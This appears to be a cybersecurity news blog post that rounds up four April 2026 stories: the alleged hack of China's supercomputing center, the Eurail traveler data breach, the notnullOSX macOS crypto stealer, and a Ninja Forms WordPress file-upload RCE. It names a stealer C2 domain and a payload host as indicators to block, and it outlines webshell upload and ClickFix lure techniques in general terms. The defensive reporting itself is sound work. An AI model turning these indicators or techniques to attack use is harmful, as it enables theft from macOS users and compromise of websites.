Security Check-in Quick Hits: Alleged Chinese Supercomputer Mega-Breach, Eurail Traveler Data Leak, notnullOSX macOS Stealer, and Ninja Forms WordPress RCE Flaw
For April 9, 2026
Alleged Hack of China’s National Supercomputing Center: 10PB of Sensitive Data Claimed Stolen
A hacker (or group) operating under the handle FlamingChina has claimed one of the largest data heists in history: more than 10 petabytes (roughly 10,000 terabytes) exfiltrated from China’s National Supercomputing Center (NSCC) in Tianjin. The alleged haul includes classified defense documents, missile schematics, aerospace research, bioinformatics, fusion simulations, and data tied to major state entities like AVIC and COMAC. Samples were reportedly posted to Telegram as early as February 6, 2026, with the extraction said to have taken six months via a compromised VPN and botnet-style distribution to avoid detection.
The story exploded on X after CNN’s April 8 coverage, with experts telling the outlet the samples appear legitimate—yet verification remains incomplete. High-engagement posts (such as from vx-underground) raised red flags: the scale is “unfathomable” in terms of storage costs alone, and the incident flew under the radar of seasoned researchers until now. If confirmed, it would represent a massive intelligence and IP compromise with serious geopolitical stakes.
Takeaway: Even state-backed supercomputing hubs aren’t immune. Organizations managing high-value research or critical infrastructure should prioritize air-gapped segments, continuous monitoring for anomalous exfiltration, and assume supply-chain or VPN vectors as primary risks. Watch for follow-on sales attempts on dark web forums.
Eurail Data Breach Exposes Personal Info of Nearly 310,000 Travelers
Eurail B.V. disclosed that a December 26, 2025 intrusion into its customer database compromised 308,777 individuals. Attackers stole full names, passport/ID numbers, bank IBANs, health information (notably for some young DiscoverEU program participants), email addresses, and phone numbers. The company notified victims on March 27, 2026; samples of the data appeared on Telegram and were offered for sale on the dark web.
Multiple cybersecurity news accounts on X amplified BleepingComputer and SecurityWeek reports, underscoring the breach’s reach across European rail pass holders. Eurail is urging vigilance against phishing and scams, immediate password resets for the Rail Planner app, and close monitoring of bank accounts.
Takeaway: This is a textbook example of why travel and identity data remain high-value targets. Individuals should treat any unsolicited Eurail-related contact as suspicious, enable multi-factor authentication everywhere possible, and consider credit freezes or fraud alerts if their details were involved. Companies holding passport-level data must treat it with the same rigor as payment cards—breach notification delays like this only amplify the damage.
notnullOSX: Sophisticated Go-Based macOS Stealer Returns Targeting High-Net-Worth Crypto Users
Moonlock Lab detailed the resurgence of notnullOSX, a modular macOS stealer from underground developer alh1mik (formerly 0xFFF). First spotted in late March 2026 across Vietnam, Taiwan, and Spain, the malware is distributed through ClickFix social-engineering campaigns (fake Google Docs prompting Terminal commands) and trojanized DMG installers, including a hijacked YouTube channel promoting a fake “WallSpace” live wallpaper app.
Once installed, it requests Full Disk Access via social engineering, then quietly grabs crypto wallets (Bitcoin Core, Electrum, etc.), browser credentials, iMessage/Notes/Telegram history, SSH keys, cloud configs, and even trojanizes hardware wallet apps. It exfiltrates via Firebase Realtime Database and is explicitly tuned for victims holding over $10,000 in crypto. The binary is multi-arch, low VT detection, and uses LaunchAgent persistence.
X posts from Virus Bulletin and others highlighted the sophisticated distribution and developer-credential focus, signaling supply-chain and lateral-movement potential.
Takeaway for macOS users: Never paste random Terminal commands from documents or browsers. Scrutinize any Full Disk Access prompts, audit LaunchAgents, and block known C2 domains (e.g., mactest-6b2ab-default-rtdb.firebaseio.com). Security teams should watch for unusual Mach-O downloads from filestackcontent.com and /tmp grabber modules. If you hold significant crypto on macOS, consider hardware wallets kept offline and endpoint detection tuned for these TTPs.
Critical Arbitrary File Upload Flaw in Ninja Forms WordPress Plugin (CVSS 9.8)
Security researcher whattheslime (via Wordfence Bug Bounty) uncovered an unauthenticated arbitrary file upload vulnerability in Ninja Forms (versions up to 3.3.26). The flaw stems from insufficient validation in the upload handler, allowing attackers to upload PHP webshells via path traversal and filename manipulation—leading to full remote code execution.
A partial fix landed February 10, 2026, with the complete patch in version 3.3.27 on March 19. Infosecurity Magazine coverage, shared on X by The Cyber Security Hub, stressed that sites still on older versions are wide open to automated exploitation.
Takeaway: WordPress site owners running Ninja Forms should update to 3.3.27 immediately (or deactivate the plugin until patched). This is the kind of unauthenticated RCE that automated scanners love—delay equals compromise. Broader lesson: keep all plugins auto-updated where possible and use Web Application Firewalls or virtual patching for public-facing forms.
These four stories dominated cybersecurity chatter in the past day, blending unverified mega-claims, belated breach disclosures, targeted malware, and everyday plugin risks. The common thread? Attackers continue to exploit trust (in updates, apps, and third-party services) while defenders race to patch and monitor. Stay vigilant, patch early, and question the extraordinary—especially when petabytes are involved.
What stood out to you in today’s feed? Drop your thoughts below. Stay safe out there.